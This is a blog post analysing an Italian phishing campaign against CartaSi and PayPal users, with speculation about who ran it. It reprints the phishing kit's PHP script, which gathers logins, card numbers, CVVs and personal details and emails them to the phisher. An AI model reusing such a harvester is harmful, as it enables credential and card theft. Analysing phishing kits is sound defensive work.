Monday, April 23, 2012

CartaSi phishing email part 2/2

Behind this phishing emails there are several people or just one guy ?

What i think is that there is only one guy because if you check the title of this script you see the write assembled by ME, if it was a team should be written Assembled by XYZ team.

Where is he from ?

His mother language is romanian and i think he lives in Italy. As you can see below there are several files written in romanian and the stolen information are sent to a fastweb email that you cannot made if you don't leave in Italy.

I was wrong in the previous article saying that the pisher hacked the webstie because was defaced by FERID23 from I suppose that at the end of September 2011 this phisher found it, uploaded a shell and created several folders in this order:
  1. d3b (postepay information stealer)
  2. stf   (cartasi, uk paypal, banca intesa, it paypal, postepay, VISA)
  3. pastote (cartasi, paypal, VISA, bancopostaclick)

Taking a look to pastote folder we see that he uses a mass mailer script to send phishing emails.

The emails address are stored in 30 rar files named pastoteXX.

From 2/3/2012 he started targetting paypal user but using a different method. I don't have any email of paypal phising but for what there is on this site i can guess that he sends an email saying you have received a bonus of 100 euro, in order to proceed login to your paypal (fake link provided) account and fill the form.

When a victim click on the link will be redirected to this fake page on this site.

Once logged in

Once filled the form and clicked send the data are redirected to a script called trimite.php which translated from romanian means send/forward. This time the data aren't stored in a txt file like previous but directly sent to a fastweb email and in the end redirect the victim to the original site.

$username = $_POST['username'];
$password = $_POST['password'];
$data = date("l, F d, Y h:i" ,time());
$nome = $_POST['nome'];
$cognome = $_POST['cognome'];
$c_tip = $_POST['credit_card_type'];
$cn = $_POST['cc_number'];
$an = $_POST['expdate_year'];
$luna = $_POST['expdate_month'];
$cvv = $_POST['cvv'];
$dob_ziua = $_POST['dob_ziua'];
$dob_luna = $_POST['dob_luna'];
$dob_an = $_POST['dob_an'];

$address1 = $_POST['adresa'];
$zip = $_POST['cod_postal'];
$city = $_POST['oras'];
$state = $_POST['provincie'];

$email = "";
$subiect = "$ip:$username:$password";
$headers  = 'MIME-Version: 1.0' . "\r\n";
$headers .= 'Content-type: text/html; charset=iso-8859-1' . "\r\n";

$mesaj_html ="

Indirizzo email $username
Password PayPal $password

Nome $nome
Gnome $cognome
Data di nascita: $dob_ziua:$dob_luna:$dob_an(ziua:luna:an)

Indirizzo $address1
CAP $zip
Città $city
Provincia $state

Tipo di carta di credito $c_tip
Numero della carta di credito $cn
Data di scadenza $luna/$an
Codice di sicurezza della carta $cvv

IP $ip
Data $data
Browser $agent
"; mail($email, $subiect, $mesaj_html, $headers); header("Location:");

He did a good job to replicate paypal login process.

In the stf folder all stolen data are sent to and the techniques used to trick users are the same explained previously.

Folder index file.

Folder content.

That's all for now.


  1. these guys have been arrested in romania

    1. Good news. There is any site that report this news ?


      Can you give me an email adress to talk to you in private please?

    3. Thank you for the links. I added a box with my email address in the right column of the blog.

  2. BlueHost is ultimately the best hosting provider for any hosting services you require.